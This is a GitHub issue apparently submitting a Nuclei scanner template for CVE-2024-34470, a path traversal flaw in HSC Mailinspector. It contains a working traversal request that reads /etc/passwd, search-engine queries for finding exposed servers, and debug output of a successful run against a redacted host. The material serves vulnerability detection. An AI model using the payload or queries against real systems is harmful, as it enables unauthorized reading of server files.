### ISSUE TITLE
Create CVE-2024-34470.yaml

### ISSUE THREAD

**Issue by topscoder** [projectdiscovery/nuclei-templates#9841]
### Template Information:

Template for CVE-2024-34470 - HSC Mailinspector Local File Inclusion vulnerability.

### Nuclei Template:

```yaml
id: CVE-2024-34470

info:
  name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
  author: topscoder
  severity: high
  description: >
    An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
  reference:
    - https://github.com/osvaldotenorio/CVE-2024-34470
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    fofa-query: "mailinspector/public"
    google-query: inurl:"/mailinspector/public"
    shodan-query: 'http.html:mailinspector/public'
  tags: cve,cve2024,lfi,exposure,mailinspector,hscmailinspector

http:
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
```

## Template results

<img width="1128" alt="Scherm­afbeelding 2024-05-21 om 11 22 51" src="https://github.com/projectdiscovery/nuclei-templates/assets/86197446/f5765b06-083d-46c0-a090-6a74822212fa">

### Redacted valid response snippet of valid match

```bash
nuclei -t /Users/topscoder/Projects/nuclei-zero-day/nuclei-templates/CVE-2024-34470.yaml -l targets.txt -debug
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.7

		projectdiscovery.io

[INF] Current nuclei version: v3.2.7 (latest)
[INF] Current nuclei-templates version: v9.8.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-34470] Dumped HTTP request for https://REDACTED/mailinspector/public/loader.php?path=../../../../../../../etc/passwd

GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2024-34470] Dumped HTTP response https://REDACTED/mailinspector/public/loader.php?path=../../../../../../../etc/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1637
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Tue, 21 May 2024 09:25:25 GMT
Expires: 0
Last-Modified: Tue, 21 May 2024 09:25:25 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: PHPSESSID=sculk4j2rupmssub3eh7oflh31; path=/;HttpOnly;Secure
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

root:REDACTED:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:*:2:2:daemon:/sbin:/sbin/nologin
REDACTED

[CVE-2024-34470:regex-1] [http] [high] https://REDACTED/mailinspector/public/loader.php?path=../../../../../../../etc/passwd
[CVE-2024-34470:status-2] [http] [high] https://REDACTED/mailinspector/public/loader.php?path=../../../../../../../etc/passwd
```
